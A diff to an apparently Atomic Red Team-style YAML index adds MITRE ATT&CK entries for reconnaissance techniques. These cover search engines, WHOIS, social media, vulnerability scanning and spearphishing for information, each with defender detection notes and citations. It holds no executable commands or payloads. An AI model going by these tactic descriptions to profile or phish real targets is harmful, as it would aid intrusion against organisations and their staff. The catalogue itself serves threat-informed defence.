+ Before compromising a victim, adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
+
+ Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:22:11.245Z'
+ created: '2020-10-02T16:50:12.809Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1596:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1596
+ url: https://attack.mitre.org/techniques/T1596
+ - source_name: WHOIS
+ url: https://www.whois.net/
+ description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ - source_name: Circl Passive DNS
+ url: https://www.circl.lu/services/passive-dns/
+ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
+ Retrieved October 20, 2020.
+ - source_name: Medium SSL Cert
+ url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
+ description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
+ from Server (Site URL). Retrieved October 20, 2020.
+ - source_name: SSLShopper Lookup
+ url: https://www.sslshopper.com/ssl-checker.html
+ description: SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.
+ - source_name: DigitalShadows CDN
+ url: https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/
+ description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
+ Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
+ You Can Do About It. Retrieved October 20, 2020.
+ - source_name: Shodan
+ url: https://shodan.io
+ description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Search Open Technical Databases
+ description: |-
+ Before compromising a victim, adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
+
+ Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:20:44.166Z'
+ created: '2020-10-02T16:56:05.810Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1593:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1593
+ url: https://attack.mitre.org/techniques/T1593
+ - source_name: Cyware Social Media
+ url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
+ description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
+ Media To Break Into Your Company. Retrieved October 20, 2020.
+ - source_name: SecurityTrails Google Hacking
+ url: https://securitytrails.com/blog/google-hacking-techniques
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved October 20, 2020.
+ - source_name: ExploitDB GoogleHacking
+ url: https://www.exploit-db.com/google-hacking-database
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Search Open Websites/Domains
+ description: |-
+ Before compromising a victim, adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
+
+ Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:22:46.374Z'
+ created: '2020-10-02T16:48:04.509Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1594:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1594
+ url: https://attack.mitre.org/techniques/T1594
+ - source_name: Comparitech Leak
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Search Victim-Owned Websites
+ description: |-
+ Before compromising a victim, adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
+
+ Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:23:37.282Z'
+ created: '2020-10-02T16:51:50.306Z'
+ x_mitre_data_sources:
+ - Web logs
+ x_mitre_detection: Monitor for suspicious network traffic that could be indicative
+ of adversary reconnaissance, such as rapid successions of requests indicative
+ of web crawling and/or large quantities of requests originating from a single
+ source (especially if the source is known to be associated with an adversary).
+ Analyzing web metadata may also reveal artifacts that can be attributed to
+ potentially malicious activity, such as referer or user-agent string HTTP/S
+ fields.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1593.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1593.001
+ url: https://attack.mitre.org/techniques/T1593/001
+ - source_name: Cyware Social Media
+ url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
+ description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
+ Media To Break Into Your Company. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Social Media
+ description: |-
+ Before compromising a victim, adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
+
+ Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
+ id: attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:22:46.235Z'
+ created: '2020-10-02T16:49:31.262Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1592.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1592.002
+ url: https://attack.mitre.org/techniques/T1592/002
+ - source_name: ATT ScanBox
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
+ Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Software
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:53:39.162Z'
+ created: '2020-10-02T16:42:17.482Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1598.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1598.002
+ url: https://attack.mitre.org/techniques/T1598/002
+ - source_name: Sophos Attachment
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ - source_name: GitHub Phishery
+ url: https://github.com/ryhanson/phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ - source_name: Microsoft Anti Spoofing
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ - source_name: ACSC Email Spoofing
+ url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Spearphishing Attachment
+ description: |-
+ Before compromising a victim, adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
+
+ All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:12:48.152Z'
+ created: '2020-10-02T17:08:57.386Z'
+ x_mitre_contributors:
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_data_sources:
+ - Mail server
+ - Email gateway
+ x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
+ accounts receiving messages from a single unusual/unknown sender. Filtering
+ based on DKIM+SPF or header analysis can help detect when the email sender
+ is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation:
+ Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1598.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1598.003
+ url: https://attack.mitre.org/techniques/T1598/003
+ - source_name: TrendMictro Phishing
+ url: https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html
+ description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
+ October 20, 2020.
+ - source_name: PCMag FakeLogin
+ url: https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages
+ description: Kan, M. (2019, October 24). Hackers Try to Phish United Nations
+ Staffers With Fake Login Pages. Retrieved October 20, 2020.
+ - source_name: Microsoft Anti Spoofing
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ - source_name: ACSC Email Spoofing
+ url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Spearphishing Link
+ description: |-
+ Before compromising a victim, adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
+
+ All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
+ id: attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:13:12.752Z'
+ created: '2020-10-02T17:09:50.723Z'
+ x_mitre_contributors:
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_data_sources:
+ - Mail server
+ - Email gateway
+ x_mitre_detection: |-
+ Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
+
+ Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1598.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1598.001
+ url: https://attack.mitre.org/techniques/T1598/001
+ - source_name: ThreatPost Social Media Phishing
+ url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
+ description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
+ Pad For Phishing Attacks. Retrieved October 20, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Spearphishing Service
+ description: |-
+ Before compromising a victim, adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
+
+ All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
+ id: attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-25T19:44:58.093Z'
+ created: '2020-10-02T17:08:07.742Z'
+ x_mitre_contributors:
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_detection: |-
+ Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1597.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1597.001
+ url: https://attack.mitre.org/techniques/T1597/001
+ - source_name: D3Secutrity CTI Feeds
+ url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
+ description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
+ Intelligence Feeds. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Threat Intel Vendors
+ description: |-
+ Before compromising a victim, adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
+
+ Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:15:53.678Z'
+ created: '2020-10-02T17:03:45.918Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1595.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1595.002
+ url: https://attack.mitre.org/techniques/T1595/002
+ - source_name: OWASP Vuln Scanning
+ url: https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanning
+ description: OWASP Wiki. (2018, February 16). OAT-014 Vulnerability Scanning.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Vulnerability Scanning
+ description: |-
+ Before compromising a victim, adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
+
+ These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
+ id: attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:58:06.761Z'
+ created: '2020-10-02T16:55:16.047Z'
+ x_mitre_data_sources:
+ - Packet capture
+ - Network device logs
+ x_mitre_detection: |-
+ Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1596.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1596.002
+ url: https://attack.mitre.org/techniques/T1596/002
+ - source_name: WHOIS
+ url: https://www.whois.net/
+ description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: WHOIS
+ description: |-
+ Before compromising a victim, adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
+
+ Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:20:43.941Z'
+ created: '2020-10-02T16:56:49.744Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
atomic_tests: []
execution:
T1059.002:
@@ -43149,6 +50945,14 @@ execution:
url: https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html
description: Apple. (2016, January 25). Introduction to AppleScript Language
Guide. Retrieved March 28, 2020.
+ - source_name: SentinelOne AppleScript
+ url: https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/
+ description: Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript
+ For Attacking macOS. Retrieved July 17, 2020.
+ - source_name: SentinelOne macOS Red Team
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
